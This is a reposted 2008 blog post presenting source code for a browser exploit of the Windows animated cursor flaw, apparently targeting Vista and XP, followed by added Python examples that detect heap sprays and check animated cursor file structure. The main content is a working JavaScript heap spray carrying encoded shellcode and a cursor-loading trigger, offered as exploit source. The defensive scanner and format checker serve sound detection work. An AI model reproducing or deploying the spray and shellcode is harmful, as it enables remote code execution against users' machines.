
Vista cursor remote overflow source code

July 23, 2008

Source: 搁浅's Blog

..::[ geqian presents ]::..

Windows Animated Cursor Handling Exploit (0day)

Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on Vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It should also work on all NT-based Windows, but not tested)

Author: geqian
Mail: 70527418@vip.qq.com

Bug discovered by determina (http://www.aground.cn/)

Credit: geqian, http://www.aground.cn/

invokes calc.exe if successful

-->

<SCRIPT language="javascript">
// Address the spray is meant to reach; the overwritten pointer lands somewhere in the sprayed region.
var heapSprayToAddress = 0x07000000;

// Payload bytes, encoded as %uXXXX pairs so that unescape() yields raw 16-bit units.
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

// Each sprayed block is 4 MiB: a filler slide followed by the payload.
var heapBlockSize = 0x400000;

// JavaScript strings are UTF-16, so the byte length is twice the string length.
var payLoadSize = payLoadCode.length * 2;

// The 0x38 bytes account for string object overhead inside each allocated block.
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

// Filler slide: "%u4141" repeated (0x41 = inc ecx, harmless single-byte instructions).
var spraySlide = unescape("%u4141%u4141");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

// Number of blocks needed to fill the heap up to the target address.
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

memory = new Array();

// Keep every block referenced so the garbage collector cannot reclaim it.
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

// The CSS cursor property makes the browser load the malformed cursor file (riff.htm).
// The quote characters around the file name were mangled on the page and are reproduced as found.
document.write("<HTML><BODY style=\"CURSOR: url($1$riff.htm$1$)\"> </BODY></HTML>")
wait(500)
window.location.reload()

// Doubles the slide until it exceeds the requested size, then trims it to exactly that size.
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT>
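The script above is a textbook browser heap spray: a large %u-encoded blob, a string that is doubled in a loop, an array filled in a loop with slide + payload, and a CSS cursor pointing at a file that is not a cursor. Each of those is visible in the page source before anything executes, so a gateway or proxy can score them. The following scanner is an added example for defenders; it is not part of the original post, the sample fragment it scans is constructed here (a harmless "%u4141" slide, no payload), and the weights and threshold are assumptions to be tuned against your own traffic.

```python
import re

# Constructed sample shaped like the spray above; not the page's script and
# containing no payload.
SAMPLE_SCRIPT = r'''
var spraySlide = unescape("%u4141%u4141");
while (spraySlide.length*2 < 0x400000) { spraySlide += spraySlide; }
memory = new Array();
for (i=0;i<200;i++) { memory[i] = spraySlide + payLoadCode; }
document.write("<BODY style=\"CURSOR: url('riff.htm')\"></BODY>");
'''

# Constructed benign fragment: a small unescape and a real .cur cursor.
BENIGN_SCRIPT = r'''
var s = unescape("%u0041");
document.body.style.cursor = "url('busy.cur')";
'''

# A run of %uXXXX escapes inside unescape("...")
UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9a-fA-F]{4})+)"\s*\)')
# x += x  (string doubling used to build the slide)
DOUBLING_RE = re.compile(r'(\w+)\s*\+=\s*\1\b')
# for (...) { arr[i] = a + b   (array filled with slide + payload)
ARRAY_FILL_RE = re.compile(
    r'for\s*\([^)]*\)\s*\{?\s*\w+\s*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+')
# CSS cursor: url(...)  with the target file captured
CURSOR_URL_RE = re.compile(r'cursor\s*:\s*url\(\s*[\'"]?([^\'")]+)', re.IGNORECASE)

def unescape_length(token):
    """Number of bytes a %uXXXX-encoded string decodes to (2 per escape)."""
    return token.count('%u') * 2

def scan_script(text):
    """Return a list of (indicator, detail) findings for one script body."""
    findings = []
    for m in UNESCAPE_RE.finditer(text):
        findings.append(('unescape_blob', unescape_length(m.group(1))))
    for m in DOUBLING_RE.finditer(text):
        findings.append(('self_doubling', m.group(1)))
    if ARRAY_FILL_RE.search(text):
        findings.append(('array_fill_loop', None))
    for m in CURSOR_URL_RE.finditer(text):
        target = m.group(1).strip()
        ext = target.rsplit('.', 1)[-1].lower() if '.' in target else ''
        if ext not in ('cur', 'ani'):
            findings.append(('cursor_url_non_cursor_ext', target))
    return findings

def spray_score(findings):
    """Assumed weights: each structural indicator adds 2; unescape blobs only
    count once they are large enough to hold code (>= 64 bytes)."""
    score = 0
    for kind, detail in findings:
        if kind == 'unescape_blob' and detail >= 64:
            score += 2
        elif kind in ('self_doubling', 'array_fill_loop', 'cursor_url_non_cursor_ext'):
            score += 2
    return score

def is_suspicious(text, threshold=4):
    return spray_score(scan_script(text)) >= threshold

if __name__ == '__main__':
    for name, src in (('sample', SAMPLE_SCRIPT), ('benign', BENIGN_SCRIPT)):
        print(name, scan_script(src), 'score', spray_score(scan_script(src)))
```

The point of scoring rather than matching a single pattern is that any one indicator (a doubled string, a big unescape) occurs in legitimate code; it is the combination with a cursor URL that points at a non-cursor file that is characteristic of this page's technique.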
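The cursor file itself (riff.htm above) is not reproduced on the page, but an animated cursor is a RIFF container with form type ACON, and the loader flaw this exploit relies on is in how an anih header chunk whose declared length differs from the 36-byte ANIHEADER structure was handled. That is background on the file format, not something the post states. The checker below is an added defensive example, not code from the post: it walks the RIFF chunk tree, refuses chunks whose declared size overruns the container, and flags any anih chunk that is not exactly 36 bytes. The sample file it checks is constructed inline and well-formed.

```python
import struct

ANIH_SIZE = 36  # size of the ANIHEADER structure in a well-formed .ani file

def build_minimal_ani():
    """Constructed well-formed sample: RIFF/ACON with one 36-byte anih chunk."""
    # cbSize, nFrames, nSteps, cx, cy, bitcount, planes, jifRate, flags
    anih = struct.pack('<9I', ANIH_SIZE, 1, 1, 0, 0, 0, 0, 1, 1)
    body = b'ACON' + b'anih' + struct.pack('<I', len(anih)) + anih
    return b'RIFF' + struct.pack('<I', len(body)) + body

def iter_chunks(data, start, end):
    """Yield (fourcc, payload_offset, length) for chunks in data[start:end],
    descending into LIST chunks. Raises ValueError on a header that does not
    fit or a payload that overruns the region."""
    pos = start
    while pos < end:
        if end - pos < 8:
            raise ValueError(f'truncated chunk header at offset {pos}')
        fourcc = data[pos:pos + 4]
        length = struct.unpack_from('<I', data, pos + 4)[0]
        payload = pos + 8
        if payload + length > end:
            raise ValueError(f'chunk {fourcc!r} at offset {pos} declares '
                             f'{length} bytes but only {end - payload} remain')
        if fourcc == b'LIST' and length >= 4:
            # LIST payload = 4-byte list type followed by nested chunks
            yield from iter_chunks(data, payload + 4, payload + length)
        else:
            yield fourcc, payload, length
        pos = payload + length + (length & 1)  # RIFF chunks are word-aligned

def check_ani(data):
    """Return a list of structural problems; empty means the file looks sane."""
    problems = []
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'ACON':
        return ['not a RIFF/ACON animated cursor']
    riff_len = struct.unpack_from('<I', data, 4)[0]
    if 8 + riff_len > len(data):
        problems.append(f'RIFF header declares {riff_len} bytes, file has {len(data) - 8}')
    end = min(8 + riff_len, len(data))
    try:
        for fourcc, off, length in iter_chunks(data, 12, end):
            if fourcc == b'anih':
                if length != ANIH_SIZE:
                    problems.append(f'anih chunk declares {length} bytes, expected {ANIH_SIZE}')
                else:
                    cb = struct.unpack_from('<I', data, off)[0]
                    if cb != ANIH_SIZE:
                        problems.append(f'anih cbSize field is {cb}, expected {ANIH_SIZE}')
    except ValueError as exc:
        problems.append(str(exc))
    return problems

if __name__ == '__main__':
    print(check_ani(build_minimal_ani()))          # []
    print(check_ani(build_minimal_ani()[:-10]))     # truncated: two problems
```

Run it on anything a mail or web gateway identifies as a cursor, regardless of extension: the page's exploit serves its cursor file as riff.htm precisely because the loader keys on content, not on the file name.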

Reposting: please credit woyigui's blog [http://www.woyigui.cn/]
Title: Vista cursor remote overflow source code
URL: http://www.woyigui.cn/2008/07/23/Vista-cursor-remote-overflow/

Category: Network security